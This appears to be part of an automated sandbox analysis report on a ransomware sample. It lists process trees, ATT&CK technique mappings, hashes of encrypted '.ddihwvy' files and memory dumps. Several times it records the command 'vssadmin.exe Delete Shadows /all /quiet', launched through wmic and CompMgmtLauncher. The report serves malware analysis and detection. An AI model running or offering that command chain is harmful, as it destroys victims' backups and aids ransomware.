vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1176

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:208
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:2496
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2408

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:228

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
252B

MD5
64fcbe6f36f66a8b9508341a95ab0b63

SHA1
a5093d9f776d6473ff8c7baa9b3f1195399bf450

SHA256
4fa4c0a50fff4acebdfabb1ce10998003557e15c182e010232ae78c9170058d5

SHA512
9ace81d2d164b0759d566ddaf7889cc3aabea02238c168101084f2284097ea1d8ae72634f6ff28c7c5af4c94b7fed29f14d361acd6733e9a37f07a5db6b3c5a4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
078753ccd0f764813477c82c594f5f18

SHA1
60c92606b3c7b3b0379f078d06d8b2e6b081ad21

SHA256
81abfb3ad16cac31fee9594cd342d132ec9394e28b9cb827603e22df051f30af

SHA512
e6fd609eb979742bd436f3a631ff8af1ef085ae5cd7937b9b0bebf13e47fc1671aec0e6605602d4a53b89159eccd8e722ef0ef964dc1a3e1ca8f897da005ec51

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1ef69395c1dc92d760b06eb2e1555d7c

SHA1
ceae5b74c45d3ccaeafe894c3eb0008a5ff40e36

SHA256
16ae25c40ec6c54b16af1d72f17248ec6f7c6860edd32b5ea66b243e5444e0ef

SHA512
bb6d1d194d134d3f325497f8726f8f8c106ceb6ffcceac133ab61fc9eb1a78dad60c6458ac3ba09a7276db8353d03012c898e3ce4d762f849ad3a9af981941d5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
056fcc4d527cec12df7891c6ecdce99f

SHA1
0f943f3d6e695c85250a5435fda70324d267803b

SHA256
2987deafcc5e2d55609759f23080f3d761bbc849a13f0c681b816a5386bfb480

SHA512
a26e5d52846c03b9228e1f6c6738238f226d46008edcca9bb19aa23ce76ec398d169ed19c17ec946a7da6bac64807d08bdeeb02bae08e26a0e8e228c1076c817

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
cfdd489c81a5e5290a5d3de904ce8c3b

SHA1
0da1d10ecb599aeef717398fb43cbd9ee7ff0f04

SHA256
491c47c8e6b7cfd4226d38141f6ff8d10e8ba46e2c1ae9e2006034237619333a

SHA512
14ef40d2f8b509624b61108f0a073f4bfc054de047c0f65f3a2e0bbb4c9012323812a09793e4c33232c1fb72cded5cb4b6a3e37b7de0afe7b27c4af10f070224

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ac678ac6f490bc2d0280a09fcb0bdb01

SHA1
aa54b9bbcdec6e88c54e182c841598bf1f094e8b

SHA256
45e7f64b560e9b9f043017398f50443077d59d0748042e814e09413fbaae7c71

SHA512
999ec31bf5c4890a99d3ad163a4fd3a47087c419475775a24747cc232647216146f98a2ded9f2005f7d599f882ad2d60682d084dbd240141a9f9a8c528cffcd3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6696a7dc820317db36d923e5b4f89dc7

SHA1
73351a30eae2300217d4c9c5e77ccb85988136d3

SHA256
d7e8a5086c8322eb7e72c9ab276fc6cc6ab44c89f0ef238d5f337443e1403a1f

SHA512
95bbd4d6da2ff06f90e888a3fc873e1f79e72837be9f00188ccc568c7cc0ec83383ab15ba5f9cdbbfa8f530fa05e9f1a9994b4814e3c8114dda66a862849d357

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e4593da8c849a2248a1ae12b9dc2c524

SHA1
f2e276409c3d2979b71b871596beefd05b75c64e

SHA256
5e137317b5ffca968f26f1581e8ace3d826fa5de4c85be7b39ee38eb05594003

SHA512
33cdce570c72890b3e54548419a68b021a77033752413d868c69f5c71822cd21bbe13e5f85a27f75ef8d9851fc38481779a604a45f01d509a9aecbae777de522

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b06891da0a52970560aa6de7ff1f85a5

SHA1
d028f7f6f16457755c8ae4bf43bf0935ef6c38b0

SHA256
a9ffe98a980f77e4cd0186e91ec8579185dc5eb17c28ae637ea11b2fe551abf5

SHA512
f870b34cc3ba660edaa809f88c00dd1017243c55a15b8db1ce54f47edc4b02b500bcad9ed02dd081a3c54f5305b18cb98191829992e262050f6ba1fb7998ebf7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
de6d5206cfc4d2fbd63a309e507b0471

SHA1
841d8cb3edce63525ef61830e0bcb03d5841f790

SHA256
7c2077090e94c2ef4c13e36f9f4f9259a754466d602722af1b7c24df4e083858

SHA512
bd7bbe662fb7d7aed0abae72e5ee8c413572ca8a91d78c4f051d17b45198d155cba3662fd40ac63d7a057b48b2f07e612b1a04945cef753a908b3bb99c96d027

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
af59edcdfcbc72e9a50858a602b79e58

SHA1
86ea61c788713b5b5eed548547a1ce5f6b6012c3

SHA256
fc2667dc5d0567a2d760de572f8cdf993e53b81602add6878e2f65a35b13c660

SHA512
3887e9c96332a0030f6367c108a33a45c93eecdf2de8294b78aa949eb815ec7c3b52a0d5daceda02ce8c4afe1462a747ff5167c31719bf0520a12418d54a062f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6df22e1c090ded963023a8f0e0d0e05c

SHA1
c9bb33ff080cb79adad599dbc56593c1263935fb

SHA256
9be1690f97aaf75385ab50900e1322804162ce406ba7f067831dfb381d2be890

SHA512
2622e396db8e25e35174f0248338d31d55fd8e8362babde7ac21f2c6bd0b4544006f058668f45b08d468c53487a15f9b4c4597efe320859f68a3c2d78c770c9f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
fa013a1fdea4bd8a68298337a9a98fe5

SHA1
c2ffe3153c4f9345d5de96720d90a085f2120a83

SHA256
47c4d6d07135bc0fa8522c1ec044c85b6e80612628c783815e7562ef55215967

SHA512
8bd7170a37bb95ffea3abab996100faafe790b3a90c2c4899f476680d687d9551f91eed06d5fa57786ee88216a93ec7cb37fbf24e205fd753c5adb14f2a37a0d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a84730955cf92b1f1c334ed5c8fd7051

SHA1
f4521a1b5a8c968e8045a618e4806bb26f4e3cbb

SHA256
a97a791406f31696108aa650ea76688747727ac92e1efd89dd8c0802b01ed69e

SHA512
c8ae340a54239464dd0382d9e807336a00b265e814461af864c43a6ed0d6ebb937f40a04c88534dc60bae4b067859a465f44cbedd7eda725f13d56894d1c705f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
dbb778745079f180dca29ebe50cdcc26

SHA1
57706b1a5732c53fc8c9821140c0bd510a57293e

SHA256
228fa67c66a663285fc8e4c460707aac0488c02bab2ad68fe3b50da6cd6f753f

SHA512
5fc1bdbc4b8afcc2402508d4e0ce444df3370ba46fedd70113bf1f398aed408eb82d96b640eea0d8b9eec5f826da8bfdc5455136a36dd5c0e9055c71d03a2d6e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a65d093debb11e5f8f0d10fafcdeca5c

SHA1
cb19663f58d440b807e83e0d08efa6fdf740cb65

SHA256
9c75f854069203eed8575f0711555c4af7c1b240f4d3f7c44afc50bb9145748f

SHA512
f9141c183f50b7feba72fccce9dc929f6dca07894bbd6f20187a2abc2bcd3702f6db8accd1a0e2a880d16255a89cee9fe9b9a2257981addbc5ef88b3c0252fad

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
3c7d3946f453c5aa855d9d523203f8f6

SHA1
3c59515439406174fc4bc6c4e58a3b8dec86d19a

SHA256
b76f404c9933af56b1a34cc00a449533f23e4691a7a28597012de4fb62297cd7

SHA512
c89986aae1fcfe05c0c3cbcfac01567de4e39937311d3f3e6621e94c27ada895e83ea7396870b899bb9156f0c0445213359b70f999fca7e64b246cf5da651036

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

Filesize
4KB

MD5
da597791be3b6e732f0bc8b20e38ee62

SHA1
1125c45d285c360542027d7554a5c442288974de

SHA256
5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07

SHA512
d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar8369.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\Desktop\ApproveUnlock.gif.ddihwvy

Filesize
355KB

MD5
fa4d0221594d29a52418ffb0f31f80f8

SHA1
42834458f7c0adc05511acd4be6a6ba6b5bf2f9f

SHA256
0aeca006e4dd3cc8a1e7711eb8d7aebf1f01d76f658e43c724eababd248bf5e9

SHA512
c27b8ed0f1d17a4ec16e14869a5cc7ea0b40a639297583e8da71ff71d82b28872d58ca3b80255bfcc2e0b15bde7f1f3c861cc922239e86409327cb9331c97b64

Download Submit
C:\Users\Admin\Desktop\ConfirmRepair.wma.ddihwvy

Filesize
409KB

MD5
4737843594580bb1a41a3426962d6bbc

SHA1
b40b077b2d3ad6193834a925dee8d7a5a65447f8

SHA256
8994f56b6ab7adcb2dacae33fe15f7e7c7659854423ce903875447a6b7a3060a

SHA512
f65ccbf3deca23faa1d037811edc56b05265bb70e8b78a720acb9aba15806bfb6b068a7d2204240cc2802dd9f7b3c25526f5a521bf6215fd3eb22b8c69e88490

Download Submit
C:\Users\Admin\Desktop\ExitUnprotect.wav.ddihwvy

Filesize
604KB

MD5
154ae28ef92a1bb6bd6eeff7507cd543

SHA1
e2a82155cf1f2ae764c540775c2d7efc9aee2210

SHA256
b450bba1a90432ae719f917237e82805de1b97284b2c92da0f0d78be7c8a961a

SHA512
4c5e87d7fd0b41915d6a7aeeedc605e0cf705d1b9252f9428c612a0c59045ebb9802662bdcd9e8f87a8a41e639b425272500621b6d31d64d00f079e5a759372e

Download Submit
C:\Users\Admin\Desktop\GetResolve.vstm.ddihwvy

Filesize
551KB

MD5
3687e33779419aa86059dd080622cba9

SHA1
bd21f80c4a64ff88f5d7326573747b774b512dcd

SHA256
db3f7d639070fee0eb9a28be1c23e1b14e45e329a7e7a91fa8c31032cfe755a9

SHA512
dd2b659a516381e7f3792ada5940fafcf04a0fc2990cf7250306768757added49788878758329fd6873dbb68580ad8e22dfa8c18ec73deaf7a21c6ab0f09d4bc

Download Submit
C:\Users\Admin\Desktop\HideSwitch.wma.ddihwvy

Filesize
533KB

MD5
ef60b8177f3a552f45525ec1ce90394c

SHA1
63f0d46820a27c781bf1848d72387da996bddb4b

SHA256
56e918ab998b611c40404f47c656967be2e65f4503c0fc04ce7bfda8751cb189

SHA512
525d13ee79d5077effb6b6abeb09b8a7aed614761486ec85256b10797ad84d0a3185256057beef9d11830a0cf3173e2863f8fbbff304fd19216d1a3a3803f098

Download Submit
C:\Users\Admin\Desktop\InitializeBlock.jpg.ddihwvy

Filesize
569KB

MD5
9f8313f0e82563eaecea9ccb47233506

SHA1
9652ef4201e01e7caee43a1df8cd80e4644b78a7

SHA256
36d719dcba97b548890e255db38d3e9d3a788ea0a914859a50413d7e8c860aa1

SHA512
a7c0c0f375e040803fed311640bbe0b25d20a9b5db92812e8a36b35f391a256ea35c17e3a39050a199cb94f1a6ef3dd33a3952dd33d59240e42509e9a8960a70

Download Submit
C:\Users\Admin\Desktop\RenameImport.mpg.ddihwvy

Filesize
213KB

MD5
1340df7b735bf9a4856d99964177efd7

SHA1
8d35cefbfd5f44aa61b7c8cbf0795cd6df649271

SHA256
8aec70b23d0676936910e27b5cbfa85b2746b92d43895274f1990c6463d67353

SHA512
7c80be380ff455756a9c337179d0b7c825a2afe6b5b788f223960d2e3af2b63cc99f64ff29cb883b3b100954b77c7dc49d154805a81d71e4c351eb9d3ea2b5d7

Download Submit
C:\Users\Admin\Desktop\RestartShow.zip.ddihwvy

Filesize
836KB

MD5
fdc072592f2e9c212102a560a3dfcd23

SHA1
b44562da28a5eb2f77bbc8c224e3fa4b67fe2ba2

SHA256
aa749936b66f9c22e15849faa45b902619de5653f00158fd30c2ece089065d62

SHA512
8eeb011a2f49cfb385ddabce8f86e8662b824034e64498cd78cb392d6cb5a92cd186687a4eb2a6679020f288085face4670485ae4ad29b0d2c474e06be88fe9a

Download Submit
C:\Users\Admin\Desktop\SplitUninstall.dotm.ddihwvy

Filesize
515KB

MD5
13967a89f0a6b27e2c86359094912a7d

SHA1
ada2304d2449896617bc701f2792fe2b6109e986

SHA256
d98c24875e762e63f10600a4d846ee18d9fe7a738fc03450fedf224bf0f5ca4c

SHA512
54716e8fec6979346df9eb4ae8c36fe804c90556aae2836d9b9d43cfd68a68eb599af791daedd5af75c0d6bd77e48cde3627ab32cfaa588b11fd68b49aebe27b

Download Submit
C:\Users\Admin\Desktop\UndoInitialize.dib.ddihwvy

Filesize
586KB

MD5
3df9a0b5bcff8515da85fa17d70b5d14

SHA1
0fc8f349a817102cca24e08e358de0bf9f3b11d5

SHA256
15d838cdee1940a7a60cc2e73f06a402ff0ee995371e48b270a0c298fec96ae2

SHA512
9b7f72e05655b1e81d5a695f777de86c2fbb43e580c61708ddc7e4031bb2fca5021f09a10ae16bd1383b61e2f9e07f3aa8af1e6ed741278d54d1c755b3833201

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
8ab88464163f42e1cc014f07b2a96e61

SHA1
f65e44c1b18294e6c079aa4a74ede2209d097c48

SHA256
2f0b623ecb1e07df7d49a7c5d20e3dca355ec255cb08bb6eb5c5536debb17d3e

SHA512
784aedb395bcc765b23f91b0f04914a8fec1fa13638e3af95d634dec6b15d8d2c101bbf0e67941647f72254b74c9494fc06bbcdebbbb43be1462494f140bcba3

Download Submit
memory/1276-15-0x0000000002170000-0x0000000002175000-memory.dmp

Filesize
20KB

Download
memory/1276-0-0x0000000002170000-0x0000000002175000-memory.dmp

Filesize
20KB

Download
memory/1900-8-0x0000000000170000-0x0000000000171000-memory.dmp

Filesize
4KB

Download
memory/1900-881-0x00000000046F0000-0x00000000046F1000-memory.dmp

Filesize
4KB

Download
memory/1900-5-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/1900-6-0x0000000000150000-0x0000000000151000-memory.dmp

Filesize
4KB

Download
memory/1900-7-0x0000000000160000-0x0000000000161000-memory.dmp

Filesize
4KB

Download
memory/1900-1-0x0000000001EB0000-0x0000000002734000-memory.dmp

Filesize
8.5MB

Download
memory/1900-17-0x00000000046D0000-0x00000000046D1000-memory.dmp

Filesize
4KB

Download
memory/1900-3-0x0000000000130000-0x0000000000131000-memory.dmp

Filesize
4KB

Download
memory/1900-883-0x00000000046F0000-0x00000000046F1000-memory.dmp

Filesize
4KB

Download
memory/1900-9-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/1900-10-0x00000000002C0000-0x00000000002C1000-memory.dmp

Filesize
4KB

Download
memory/1900-2-0x0000000000120000-0x0000000000121000-memory.dmp

Filesize
4KB

Download
memory/1900-11-0x00000000002D0000-0x00000000002D1000-memory.dmp

Filesize
4KB

Download
memory/1900-12-0x00000000002F0000-0x00000000002F1000-memory.dmp

Filesize
4KB

Download
memory/1900-13-0x0000000000300000-0x0000000000301000-memory.dmp

Filesize
4KB

Download